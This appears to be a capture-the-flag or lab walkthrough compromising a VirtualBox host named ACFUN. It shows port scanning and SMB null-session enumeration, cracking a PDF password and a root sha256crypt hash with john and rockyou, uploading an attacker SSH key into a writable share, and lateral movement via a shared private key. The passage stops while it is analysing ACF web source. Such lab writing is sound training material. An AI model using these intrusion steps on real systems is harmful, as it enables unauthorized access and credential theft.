┌──(root㉿Eecho)-[/tmp/aaaa] └─# rustscan -a 192.168.100.62 -- -A .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: Exploring the digital landscape, one IP at a time.
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.100.62:22 Open 192.168.100.62:139 Open 192.168.100.62:445 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.100.62 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-29 19:43 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 19:43 Completed NSE at 19:43, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 19:43 Completed NSE at 19:43, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 19:43 Completed NSE at 19:43, 0.00s elapsed Initiating ARP Ping Scan at 19:43 Scanning 192.168.100.62 [1 port] Completed ARP Ping Scan at 19:43, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 19:43 Completed Parallel DNS resolution of 1 host. at 19:43, 2.50s elapsed DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0] Initiating SYN Stealth Scan at 19:43 Scanning 192.168.100.62 [3 ports] Discovered open port 445/tcp on 192.168.100.62 Discovered open port 22/tcp on 192.168.100.62 Discovered open port 139/tcp on 192.168.100.62 Completed SYN Stealth Scan at 19:43, 0.02s elapsed (3 total ports) Initiating Service scan at 19:43 Scanning 3 services on 192.168.100.62 Completed Service scan at 19:43, 11.02s elapsed (3 services on 1 host) Initiating OS detection (try #1) against 192.168.100.62 NSE: Script scanning 192.168.100.62. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 19:43 Completed NSE at 19:43, 0.38s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 19:43 Completed NSE at 19:43, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 19:43 Completed NSE at 19:43, 0.00s elapsed Nmap scan report for 192.168.100.62 Host is up, received arp-response (0.00052s latency). Scanned at 2026-04-29 19:43:26 CST for 13s
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0 (protocol 2.0) 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.21.9 (workgroup: WORKGROUP) MAC Address: 08:00:27:17:D8:D3 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.99%E=4%D=4/29%OT=22%CT=%CU=35967%PV=Y%DS=1%DC=D%G=N%M=080027%TM OS:=69F1EEEB%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=106%TI=Z%CI=Z%II=I% OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5 OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6= OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S)
Uptime guess: 6.822 days (since Wed Apr 22 23:59:57 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=264 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: ACFUN
======================================= | Listener Scan on 192.168.100.62 | ======================================= [*] Checking LDAP [-] Could not connect to LDAP on 389/tcp: connection refused [*] Checking LDAPS [-] Could not connect to LDAPS on 636/tcp: connection refused [*] Checking SMB [+] SMB is accessible on 445/tcp [*] Checking SMB over NetBIOS [+] SMB over NetBIOS is accessible on 139/tcp
============================================================= | NetBIOS Names and Workgroup/Domain for 192.168.100.62 | ============================================================= [+] Got domain/workgroup name: WORKGROUP [+] Full NetBIOS names information: - ACFUN <00> - B <ACTIVE> Workstation Service - ACFUN <03> - B <ACTIVE> Messenger Service - ACFUN <20> - B <ACTIVE> File Server Service - WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name - WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections - MAC Address = 00-00-00-00-00-00
============================================================= | Domain Information via SMB session for 192.168.100.62 | ============================================================= [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found domain information via SMB NetBIOS computer name: ACFUN NetBIOS domain name: '' DNS domain: '' FQDN: localhost Derived membership: workgroup member Derived domain: unknown
=========================================== | RPC Session Check on 192.168.100.62 | =========================================== [*] Check for anonymous access (null session) [+] Server allows authentication via username '' and password '' [*] Check for guest access [+] Server allows authentication via username 'eirkself' and password '' [H] Rerunning enumeration with user 'eirkself' might give more results
===================================================== | Domain Information via RPC for 192.168.100.62 | ===================================================== [+] Domain: WORKGROUP [+] Domain SID: NULL SID [+] Membership: workgroup member
================================================= | OS Information via RPC for 192.168.100.62 | ================================================= [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found OS information via SMB [*] Enumerating via 'srvinfo' [+] Found OS information via 'srvinfo' [+] After merging OS information we have the following result: OS: Linux/Unix (Samba 4.21.9) OS version: '6.1' OS release: '' OS build: '0' Native OS: Windows 6.1 Native LAN manager: Samba 4.21.9 Platform id: '500' Server type: '0x809a03' Server type string: Wk Sv PrQ Unx NT SNT Samba Server
======================================= | Users via RPC on 192.168.100.62 | ======================================= [*] Enumerating users via 'querydispinfo' [+] Found 1 user(s) via 'querydispinfo' [*] Enumerating users via 'enumdomusers' [+] Found 1 user(s) via 'enumdomusers' [+] After merging user results we have 1 user(s) total: '1000': username: leaf name: '' acb: '0x00000010' description: ''
======================================== | Groups via RPC on 192.168.100.62 | ======================================== [*] Enumerating local groups [+] Found 0 group(s) via 'enumalsgroups domain' [*] Enumerating builtin groups [+] Found 0 group(s) via 'enumalsgroups builtin' [*] Enumerating domain groups [+] Found 0 group(s) via 'enumdomgroups'
======================================== | Shares via RPC on 192.168.100.62 | ======================================== [*] Enumerating shares [+] Found 2 share(s): IPC$: comment: IPC Service (Samba Server) type: IPC public: comment: '' type: Disk [*] Testing share IPC$ [+] Mapping: OK, Listing: NOT SUPPORTED [*] Testing share public [+] Mapping: OK, Listing: OK
=========================================== | Printers via RPC for 192.168.100.62 | =========================================== [+] No printers returned (this is not an error)
Completed after 0.98 seconds
允许匿名 + guest 登录
共享里有 public 和 leaf
枚举到了用户 leaf(最小密码长度仅为 5 且没有锁定阈值)
查看匿名共享
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿Eecho)-[/tmp/aaaa] └─# smbclient //192.168.100.62/public -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Apr 26 16:04:33 2026 .. D 0 Sun Apr 26 16:04:33 2026 ACF_Framework_Internal_Guide.pdf N 3020 Sun Apr 26 16:04:25 2026
9468048 blocks of size 1024. 708304 blocks available smb: \> get ACF_Framework_Internal_Guide.pdf getting file \ACF_Framework_Internal_Guide.pdf of size 3020 as ACF_Framework_Internal_Guide.pdf (589.8 KiloBytes/sec) (average 589.8 KiloBytes/sec) smb: \>
需要密码使用johb爆破
1 2 3 4 5 6 7 8 9 10
┌──(root㉿Eecho)-[/tmp/aaaa] └─# pdf2john ACF_Framework_Internal_Guide.pdf > pdf_hash.txt ┌──(root㉿Eecho)-[/tmp/aaaa] └─# john --wordlist=/usr/share/wordlists/rockyou.txt pdf_hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64]) Cost 1 (revision) is 3 for all loaded hashes Will run 24 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 1234567890 (ACF_Framework_Internal_Guide.pdf)
pdf中有一点隐写
复制出来是
To initialize the framework for our internal acfun.dsz services, run the following commands as root:
┌──(root㉿Eecho)-[/tmp/aaaa] └─# smbclient //192.168.100.62/leaf -U leaf%gothic Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Apr 26 15:53:08 2026 .. D 0 Sun Apr 26 15:53:08 2026 .ssh DH 0 Sun Apr 26 16:10:23 2026
9468048 blocks of size 1024. 707068 blocks available smb: \> cd .ssh\ smb: \.ssh\> ls . D 0 Sun Apr 26 16:10:23 2026 .. D 0 Sun Apr 26 15:53:08 2026 id_ed25519.pub N 92 Sun Apr 26 16:09:15 2026 id_ed25519 N 399 Sun Apr 26 16:09:15 2026
9468048 blocks of size 1024. 707068 blocks available smb: \.ssh\> put authorized_keys putting file authorized_keys as \.ssh\authorized_keys (15.0 kB/s) (average 15.0 kB/s) smb: \.ssh\> ls . D 0 Wed Apr 29 20:32:29 2026 .. D 0 Sun Apr 26 15:53:08 2026 id_ed25519.pub N 92 Sun Apr 26 16:09:15 2026 authorized_keys A 92 Wed Apr 29 20:32:29 2026 id_ed25519 N 399 Sun Apr 26 16:09:15 2026
9468048 blocks of size 1024. 707064 blocks available smb: \.ssh\>
登录到leaf共享后有个.ssh文件夹这里我直接上传了我的公钥
ssh登录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
┌──(root㉿Eecho)-[/tmp/aaaa] └─# ssh leaf@192.168.100.62 -i ~/.ssh/id_ed25519 The authenticity of host '192.168.100.62 (192.168.100.62)' can't be established. ED25519 key fingerprint is: SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY This host key is known by the following other names/addresses: ~/.ssh/known_hosts:8: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.100.62' (ED25519) to the list of known hosts. _ __ _____| | ___ ___ _ __ ___ ___ \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \ \ V V / __/ | (_| (_) | | | | | | __/ \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
leaf@Acfun:~$ id uid=1000(leaf) gid=1000(leaf) groups=1000(leaf) leaf@Acfun:~$
提权
leaf -> xueli
横向移动到xueli,leaf和xueli公用一套密钥
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
leaf@Acfun:/tmp$ ssh xueli@127.0.0.1 -i /home/leaf/.ssh/id_ed25519 The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ED25519 key fingerprint is SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts. _ __ _____| | ___ ___ _ __ ___ ___ \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \ \ V V / __/ | (_| (_) | | | | | | __/ \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
xueli@Acfun:~$ id uid=1001(xueli) gid=1001(xueli) groups=1001(xueli) xueli@Acfun:~$
┌──(root㉿Eecho)-[/tmp/aaaa] └─# vim hash.txt ┌──(root㉿Eecho)-[/tmp/aaaa] └─# cat hash.txt root:$5$rDkGkMAvv6FPpwRG$.gS5I9LcOiZDYGW598cgXDPEDvHI7GLl.UmVxgdyUQ0 ┌──(root㉿Eecho)-[/tmp/aaaa] └─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha256crypt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 24 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status juggernaut (root) 1g 0:00:00:01 DONE (2026-04-29 22:06) 0.7462g/s 55020p/s 55020c/s 55020C/s silvi..compu Use the "--show" option to display all of the cracked passwords reliably Session completed.
登录web(不登录root是因为ACF的用户密码与系统用户密码相互独立)
成功登录进去
没看到直接利用的功能分析源码
1. ACF 用户管理密码修改 (app/acf-util/)
这个功能用于管理 ACF 系统内部的用户账户:
控制器 (password-controller.lua):
editme - 用户修改自己的密码和设置
edituser - 管理员修改任意用户的密码和设置
模型 (password-model.lua:124-159):
update_user 函数处理密码更新
密码验证规则:最少4个字符,不能全是数字
修改时密码留空表示不修改密码
2. Linux 系统密码修改 (app/alpine-baselayout/)
控制器 ( password-controller.lua:6-8 ):
1 2 3 4 5
function mymodule.edit(self) return self.handle_form(self, self.model.read_password, self.model. update_password, self.clientdata, "Save", "Set System Password", "Password Set") end
模型 ( password-model.lua:72-128 ): 这个 update_password 函数是真正修改 Linux 系统密码的核心功能: